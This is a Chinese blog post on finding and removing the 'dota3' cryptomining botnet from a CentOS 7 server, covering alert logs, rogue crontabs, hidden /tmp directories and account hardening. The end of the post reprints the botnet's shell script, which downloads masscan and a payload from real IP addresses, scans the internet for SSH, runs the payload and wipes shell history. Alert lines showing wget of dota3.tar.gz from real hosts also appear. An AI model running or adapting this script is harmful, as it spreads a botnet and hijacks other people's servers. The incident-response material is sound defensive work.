CentOS7 下处理挖矿僵尸网络dota3木马攻击

最新推荐文章于 2024-04-23 14:16:14 发布

乱了心跳

最新推荐文章于 2024-04-23 14:16:14 发布

阅读量805

点赞数

本文链接：https://blog.csdn.net/u013308762/article/details/119597379

版权

转载自：https://mip.yht7.com/news/88716

先登录阿里云后台，查看安全中心的告警祥情，发现有几条记录：

父进程路径：/usr/bin/bash
父进程命令行：sh -c ./tddwrt7s.sh “http://67.205.135.65/dota3.tar.gz”
“http://91.121.51.120/dota3.tar.gz” “http://51.75.28.134/dota3.tar.gz”
“http://159.203.17.176/dota3.tar.gz” “http://46.101.113.206/dota3.tar.gz”
“http://104.131.189.116/dota3.tar.gz” “http://81.12.13.145/dota3.tar.gz” >.out 2>&1 3>&1
父进程id：15912
进程id：15913
用户名：user_web
URL链接：http://91.121.51.120/dota3.tar.gz
进程路径：/usr/bin/bash
命令行参数：/bin/bash ./tddwrt7s.sh http://67.205.135.65/dota3.tar.gz
http://91.121.51.120/dota3.tar.gz http://51.75.28.134/dota3.tar.gz
http://159.203.17.176/dota3.tar.gz http://46.101.113.206/dota3.tar.gz
http://104.131.189.116/dota3.tar.gz http://81.12.13.145/dota3.tar.gz
父进程路径：/usr/bin/bash
父进程命令行：-bash
父进程id：9071
进程id：9186
用户名：user_web
URL链接：http://45.55.129.23/dota3.tar.gz
进程路径：/usr/bin/wget
命令行参数：wget http://45.55.129.23/dota3.tar.gz
root账号，登录服务器，排查问题。

查看服务器有无可疑的TCP端口：

$ netstat -lnpt
没有发现非常用端口。

根据告警信息，拿进程id找对应的进程，一个都没有找到。

一、立刻做几个操作：

修改user_web密码（当前服务器除了root，就只有user_web授权ssh登录）；
修改root密码，禁止root的ssh登录（只能先登录user_web，再切到root账号）；
清掉root, user_web目录下.ssh/authorized_keys 里面所有公钥（禁止所有密钥登录）；

然后，再一步步来查。
没有找到对应的进程，看下是不是有crontab，定时执行，执行完进程就退出，找不到告警时的进程id。

二、查找服务器所有账号的crontab:

$ cat /etc/passwd | cut -f 1 -d : |xargs -I {} crontab -l -u {}
…
no crontab for tcpdump
no crontab for ntp
no crontab for saslauth
no crontab for mysql
5 8 * * 0 /home/user_web/.configrc/a/upd>/dev/null 2>&1
@reboot /home/user_web/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0 /home/user_web/.configrc/b/sync>/dev/null 2>&1
@reboot /home/user_web/.configrc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1
no crontab for haproxy
…
发现了crontab，脚本在user_web目录。

立刻删除 /home/user_web/目录下，crontab使用的和不认识的隐藏目录。
查看是不是user_web账号起的crontab：

$ crontab -l -u user_web
5 8 * * 0 /home/user_web/.configrc/a/upd>/dev/null 2>&1
@reboot /home/user_web/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0 /home/user_web/.configrc/b/sync>/dev/null 2>&1
@reboot /home/user_web/.configrc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1
果然是user_web起的。清理user_web下所有的crontab。

$ crontab -r -u user_web
三、查找还有没有使用user_web账号运行的进程：

$ ps -ef | grep user_web
user_web 25408 1 0 00:14 ? 00:00:00 /tmp/.X25-unix/.rsync/c/lib/64/tsm --library-path /tmp/.X25-unix/.rsync/c/lib/64/ /tmp/.X25-unix/.rsync/c/tsm64 -t 515 -f 1 -s 12 -S 10 -p 0 -d 1 p ip
root 32695 30901 0 01:06 pts/1 00:00:00 grep --color=auto user_web

找到了user_web执行的进程，脚本文件所在的路径，在 /tmp/ 目录下的隐藏文件。

先杀掉进程：

$ kill -9 25408
进入目录：

$ cd /tmp/

进入目录，查看包括隐藏文件在内的所有文件：

$ ls -la
删掉隐藏目录：

$ rm -rf .X25-unix
四、根据告警中出现的进程路径/usr/bin/bash，再次查找sh脚本进程：

$ ps -ef | grep sh
user_web 3768 1 0 00:00 ? 00:00:00 /bin/bash ./go
root 24487 1 0 Mar25 ? 01:53:25 /usr/sbin/sshd -D
user_web 25403 25402 0 00:14 ? 00:00:00 /bin/bash ./tsm -t 515 -f 1 -s 12 -S 10 -p 0 -d 1 p ip
root 30862 24487 0 01:37 ? 00:00:01 sshd: user_web [priv]
user_web 30866 30862 0 01:37 ? 00:00:00 sshd: user_web@pts/1
user_web 30867 30866 0 01:37 pts/1 00:00:00 -bash
root 30901 30896 0 01:38 pts/1 00:00:00 bash
root 31799 30901 0 01:53 pts/1 00:00:00 grep --color=auto sh

又找到了几个可疑的进程。查看进程信息，找进程执行路径cwd，对应的执行命令cmd：

$ ll /proc/25403
找到进程脚本路径，杀掉进程，再删掉脚本文件所在的文件夹：

至此，清理完毕。

后续：加强异地登录的告警，强化账号登录的认证，添加部署谷歌验证器(Google Authenticator)

后记，观察几天，再没有收到阿里云的告警信息。

附sh脚本源码，请勿违法实验，仅供学习研究：

#!/bin/bash

if [[ $(id -u) -ne 0 ]] ; then echo “Please run as root” ; exit 1 ; fi

PR=1
PR=$(cat /proc/cpuinfo | grep model | grep name | wc -l)

ARCH=uname -m

if [[ “$ARCH” =~ ^arm ]]; then
echo “Arm detected. Exiting”
exit
fi

if [ $PR -gt 9 ]; then
echo “Too many CPUs. Exiting”
exit
else
echo “CPUs ok”

#random sleep, for flood protection
rm -rf masscan*
rm -rf input.txt*

RANGE=440
s=$RANDOM
let “s %= $RANGE”
sleep $s
echo “test”

#is it good for masscan?

wget -q http://45.55.210.248/masscan || curl -s O -f http://104.236.72.182/masscan
sleep 25m
chmod 777 masscan
timeout 20s nohup ./masscan -p 22 --banner --rate 50000 --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8 --range 1.0.0.0-223.255.255.255 > input.txt

sleep 1m

got=$(cat input.txt | grep OpenSSH | wc -l | awk -F: “{if($0>1)print$0}”)

rm -rf masscan*

if got > 1000; good for masscan; else exit

if [ $got -lt 1000 ]; then
echo “Bad for masscan. Exiting”
rm -rf input.txt*
exit
else
echo “Good for masscan. Executing”
rm -rf input.txt*
#all good

pkill -9 screen
pkill -9 mass
pkill -9 scan

apt install expect -y
yum install expect -y

sleep 5s

rm -rf /.a
cd  / 
mkdir .a
cd .a
wget -q http://45.55.129.23/mas.tar.gz || curl -s O -f http://45.55.129.23/mas.tar.gz 
sleep 25m && tar xvf mas.tar.gz 
rm -rf mas.tar.gz
cd mass2ip
nohup ./mass.sh >>/dev/null 2>1& 
cd ~ 
rm -rf .bash_history 
history -c 
history -nc
fi

乱了心跳

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
CentOS7 下处理挖矿僵尸网络dota3木马攻击

转载自：https://mip.yht7.com/news/88716先登录阿里云后台，查看安全中心的告警祥情，发现有几条记录：父进程路径：/usr/bin/bash父进程命令行：sh -c ./tddwrt7s.sh “http://67.205.135.65/dota3.tar.gz”“http://91.121.51.120/dota3.tar.gz” “http://51.75.28.134/dota3.tar.gz”“http://159.203.17.176/dota3.tar.gz”
复制链接

扫一扫